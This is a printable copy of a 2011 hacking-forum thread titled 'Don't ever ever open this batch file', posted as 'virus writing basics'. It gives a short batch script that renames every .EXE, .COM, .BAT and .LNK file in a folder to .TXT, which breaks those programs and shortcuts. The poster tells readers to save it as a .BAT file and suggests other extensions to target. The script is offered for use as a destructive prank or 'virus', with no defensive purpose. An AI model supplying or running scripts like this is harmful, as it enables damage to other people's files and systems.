![]() |
|
Don't ever ever open this batch file - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: Don't ever ever open this batch file (/Thread-Don-t-ever-ever-open-this-batch-file) |
Don't ever ever open this batch file - benvert - 08-21-2011 This is the virus writing basics section. Today we I'm going to show you to disable or corrupt files. This is demonstrated using batch programing/dos programing. In order to corrupt files all that we do is change files to non-working TXT files or some other format. ![]() REN *.EXE *.TXT REN *.COM *.TXT REN *.BAT *.TXT REN *.LNK *.TXT Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like:mad: *.JPEG *.DOC |